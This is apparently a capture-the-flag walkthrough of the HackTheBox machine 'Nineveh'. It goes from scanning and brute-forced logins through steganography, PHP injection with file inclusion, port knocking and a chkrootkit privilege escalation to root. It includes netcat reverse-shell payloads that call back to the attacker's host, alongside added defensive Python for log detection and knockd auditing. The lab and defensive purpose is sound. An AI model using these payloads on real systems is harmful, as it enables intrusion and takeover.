As always, we start with an nmap scan. This machine was very interesting because it combined a lot of vulnerabilities and unusual configurations, such as port knocking.
root@Kali2:~/Desktop# nmap -sC -sV -O -T5 10.10.10.43
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 11:00 CET
Nmap scan report for 10.10.10.43
Host is up (0.018s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
With dirb and hydra we found:

http://10.10.10.43/department/login.php   admin:1q2w3e4r5t
https://10.10.10.43/db/                   password123
https://10.10.10.43/secure_notes/
secure_notes contains an image with steganography.
root@Kali2:~/Desktop# binwalk -h

Binwalk v2.1.2
Craig Heffner, ReFirmLabs

Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ...

Extraction Options:
    -e, --extract                Automatically extract known file types
    -D, --dd=<type:ext:cmd>      Extract <type> signatures, give the files an extension of <ext>, and execute <cmd>
    -M, --matryoshka             Recursively scan extracted files
    -d, --depth=<int>            Limit matryoshka recursion depth (default: 8 levels deep)
    -C, --directory=<str>        Extract files/folders to a custom directory (default:

root@Kali2:~/Desktop# binwalk -Me nineveh.png

Scan Time:     2019-10-29 11:17:44
Target File:   /root/Desktop/nineveh.png
MD5 Checksum:  353b8f5a4578e4472c686b6e1f15c808
Signatures:    386

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84            0x54            Zlib compressed data, best compression
2881744       0x2BF8D0        POSIX tar archive (GNU)

Scan Time:     2019-10-29 11:17:45
Target File:   /root/Desktop/_nineveh.png.extracted/54
MD5 Checksum:  d41d8cd98f00b204e9800998ecf8427e
Signatures:    386

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------

Scan Time:     2019-10-29 11:17:45
Target File:   /root/Desktop/_nineveh.png.extracted/secret/nineveh.pub
MD5 Checksum:  6b60618d207ad97e76664174e805cfda
Signatures:    386

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             OpenSSH RSA public key

Scan Time:     2019-10-29 11:17:45
Target File:   /root/Desktop/_nineveh.png.extracted/secret/nineveh.priv
MD5 Checksum:  f426d661f94b16292efc810ebb7ea305
Signatures:    386

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PEM RSA private key
Inside it there is a private and a public key, but for now we do not know where to use them.
https://10.10.10.43/db/ is running phplite with a vulnerability in the database handling that lets us execute PHP.
And then, accessing:

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=ls

SQLite format 3@ -� ��S�tableaaCREATE TABLE 'a' ('css files footer.php header.php index.php login.php logout.php manage.php underconstruction.jpg underconstruction.jpg' INTEGER)

For a reverse shell:

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.4+1234+>/tmp/f

Once on the machine we upload our cronchecker:
2019-10-29 07:38:08-- http://10.10.14.4:8000/cronchecker.sh
Connecting to 10.10.14.4:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 338 [text/x-sh]
Saving to: 'cronchecker.sh'

cronchecker.sh      100%[===================>]     338  --.-KB/s    in 0s

2019-10-29 07:38:08 (69.9 MB/s) - 'cronchecker.sh' saved [338/338]

www-data@nineveh:/dev/shm$ chmod +x cronchecker.sh
www-data@nineveh:/dev/shm$ bash cronchecker.sh
< root      1307  1.0  0.2   8756  2228 ?  Ss  07:18  0:12  /usr/sbin/knockd -d -i ens33
> root      1307  1.0  0.2   8756  2228 ?  Ss  07:18  0:13  /usr/sbin/knockd -d -i ens33
< root       598  0.0  0.0      0     0 ?  S   07:18  0:00  \_ [kworker/0:6]
< www-data 13017  0.0  0.9 270468  9748 ?  S   07:30  0:00  \_ /usr/sbin/apache2 -k start
> www-data 13017  0.0  1.5 270920 15324 ?  S   07:30  0:00  \_ /usr/sbin/apache2 -k start
> root     21131  0.0  0.2  50224  2932 ?  S   07:39  0:00  \_ /usr/sbin/CRON -f
> root     21132  0.0  0.0   4512   804 ?  Ss  07:39  0:00  \_ /bin/sh -c /root/vulnScan.sh
> root     21134  0.0  0.2  12516  3016 ?  S   07:39  0:00  \_ /bin/bash /root/vulnScan.sh
> root     21136  1.0  0.2   4796  2072 ?  S   07:39  0:00  \_ /bin/sh /usr/bin/chkrootkit
> root     21610  0.0  0.0   4796   432 ?  S   07:39  0:00  \_ /bin/sh /usr/bin/chkrootkit
> root     21611  0.0  0.1  28920  1556 ?  R   07:39  0:00  \_ /bin/ps ax
> root     21612  0.0  0.0  14228  1016 ?  S   07:39  0:00  \_ grep -E (^|[^A-Za-z0-9_])sshd([^A-Za-z0-9_]|$)
> root     21613  0.0  0.1  14228  1020 ?  S   07:39  0:00  \_ grep -E -v grep
> root     21614  0.0  0.0  14228   936 ?  S   07:39  0:00  \_ grep -E -v chkrootkit
> root     21615  0.0  0.0   4796   436 ?  S   07:39  0:00  \_ /bin/sh /usr/bin/chkrootkit
> root     21616  0.0  0.1  24760  1420 ?  S   07:39  0:00  \_ /usr/bin/awk { print $5 }

We discover two interesting things:
- chkrootkit (vulnerable)
- knockd (port knocking)
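From the defender's side, the manage.php requests used above leave a clear trace in the Apache access log. The Python below is an added example, not part of the original writeup: it parses combined-format log lines and flags a notes parameter that names an absolute path or traverses directories, plus any cmd parameter, decoding the URL encoding first so that %3b and + do not hide the payload. The log lines are constructed for the demo.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines modelled on the requests above; the two
# middle ones reproduce the manage.php LFI + cmd abuse, the others are benign.
SAMPLE_LOG = """\
10.10.14.4 - - [29/Oct/2019:07:30:01 +0000] "GET /department/manage.php?notes=files/ninevehNotes.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.4 - - [29/Oct/2019:07:31:12 +0000] "GET /department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=ls HTTP/1.1" 200 1034 "-" "Mozilla/5.0"
10.10.14.4 - - [29/Oct/2019:07:33:40 +0000] "GET /department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.4+1234+>/tmp/f HTTP/1.1" 200 0 "-" "curl/7.64.0"
10.10.14.9 - - [29/Oct/2019:07:35:02 +0000] "GET /department/login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SHELL_META = re.compile(r'[;|&`$]')

def analyse_line(line):
    """Reasons a manage.php request looks like the LFI/command abuse above (empty = clean)."""
    m = LINE_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/manage.php"):
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # decodes %3b, %26 and '+'
    reasons = []
    for notes in params.get("notes", []):
        if notes.startswith("/") or ".." in notes:
            reasons.append("notes=%s is an absolute path or traversal" % notes)
    for cmd in params.get("cmd", []):
        reasons.append("cmd parameter present: %r" % cmd)
        if SHELL_META.search(cmd):
            reasons.append("cmd contains shell metacharacters")
    return reasons

def scan_log(text):
    """Return (ip, timestamp, reasons) for every suspicious line in an access log."""
    findings = []
    for line in text.splitlines():
        reasons = analyse_line(line)
        if reasons:
            m = LINE_RE.match(line)
            findings.append((m.group("ip"), m.group("ts"), reasons))
    return findings
```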
LinEnum shows us that SSH is listening on localhost (wtf) and knockd once again:
[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root 1037528 Jun 24  2016 /bin/bash
lrwxrwxrwx 1 root root       4 Jul  2  2017 /bin/sh -> dash
...
-rwxr-xr-x 1 root root   48080 Mar 25  2009 /usr/sbin/knockd
…

[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN

To check knockd we can look at its config file:
www-data@nineveh:/dev/shm$ cat /etc/knockd.conf
[options]
    logfile = /var/log/knockd.log
    interface = ens33

[openSSH]
    sequence = 571, 290, 911
    seq_timeout = 5
    start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags = syn

[closeSSH]
    sequence = 911,290,571
    seq_timeout = 5
    start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags = syn

To open the port we need to "knock" on 571, 290 and 911:
root@Kali2:~/Desktop# for x in 571 290 911; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 10.10.10.43; done
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 13:54 CET
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.

PORT    STATE    SERVICE
571/tcp filtered umeter

Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 13:54 CET
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.

PORT    STATE    SERVICE
290/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 1.14 seconds
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 13:54 CET
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.

PORT    STATE    SERVICE
911/tcp filtered xact-backup

Nmap done: 1 IP address (1 host up) scanned in 1.15 seconds
root@Kali2:~/Desktop# nmap -p 22 10.10.10.43
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 13:54 CET
Nmap scan report for 10.10.10.43
Host is up (0.020s latency).

PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

Once it is open we can log in via SSH with the key extracted from the image.
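On the defensive side, the knock sequence was only a secret while /etc/knockd.conf was unreadable to www-data, and the ACCEPT rule stays in place until someone sends the close sequence. The Python below is an added example (not from the writeup): it parses a knockd.conf with configparser and reports both issues, next to a hardened variant that uses knockd's cmd_timeout and stop_command so the rule expires on its own; the config text and file mode are constructed inputs.

```python
import configparser
import stat
# Constructed copy of the config read from /etc/knockd.conf above (not a live file).
NINEVEH_CONF = """\
[options]
    logfile = /var/log/knockd.log
    interface = ens33
[openSSH]
    sequence = 571, 290, 911
    seq_timeout = 5
    start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags = syn
[closeSSH]
    sequence = 911,290,571
    seq_timeout = 5
    start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags = syn
"""
# Same rule, but knockd removes the ACCEPT entry itself after 10 seconds
# (cmd_timeout / stop_command are standard knockd options): no close sequence needed.
HARDENED_CONF = """\
[openSSH]
    sequence = 571, 290, 911
    seq_timeout = 5
    tcpflags = syn
    start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    cmd_timeout = 10
    stop_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
"""

def parse_knockd(text):
    """Return {section: (sequence list, start_command, stop_command, cmd_timeout)}."""
    cp = configparser.ConfigParser(interpolation=None)  # keep %IP% literal
    cp.read_string(text)
    return {s: ([p.strip() for p in cp[s].get("sequence", "").split(",")],
                cp[s].get("start_command", ""), cp[s].get("stop_command", ""),
                cp[s].getint("cmd_timeout", fallback=0))
            for s in cp.sections() if s != "options"}

def audit_knockd(text, conf_mode):
    """Findings for a knockd config and the mode of the file holding it (e.g. 0o644)."""
    findings = []
    if conf_mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append("config readable by group/other: any local user learns the sequence")
    for name, (_, start, stop, timeout) in parse_knockd(text).items():
        words = start.split()
        if "ACCEPT" in words and "-D" not in words and not (stop and timeout):
            findings.append(name + ": ACCEPT rule stays until a close sequence arrives; "
                            "set cmd_timeout and stop_command")
    return findings
```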
Now let's look at chkrootkit.
root@Kali2:~/Desktop# searchsploit chkrootkit
---------------------------------------------------- ----------------------------------------
 Exploit Title                                      |  Path
                                                    | (/usr/share/exploitdb/)
---------------------------------------------------- ----------------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit) | exploits/linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation        | exploits/linux/local/33899.txt
---------------------------------------------------- ----------------------------------------
Shellcodes: No Result

root@Kali2:~/Desktop# searchsploit -x 33899
- Put an executable file named 'update' with non-root owner in /tmp (not mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively rooting your box, if malicious content is placed inside the file.

searchsploit tells us that a file placed at /tmp/update will be executed as root, so we create a file called "update":
#!/bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1234 >/tmp/f

And it calls home 🙂
root@Kali2:~/Desktop# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.43] 39640
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# python3 -c 'import pty;pty.spawn("/bin/bash");'
root@nineveh:~# ^Z
[1]+  Stopped                 nc -nlvp 1234
root@Kali2:~/Desktop# stty raw -echo
root@Kali2:~/Desktop# nc -nlvp 1234

root@nineveh:~# cd /
root@nineveh:/# cd root/
root@nineveh:~# cat root.txt
8a2b49...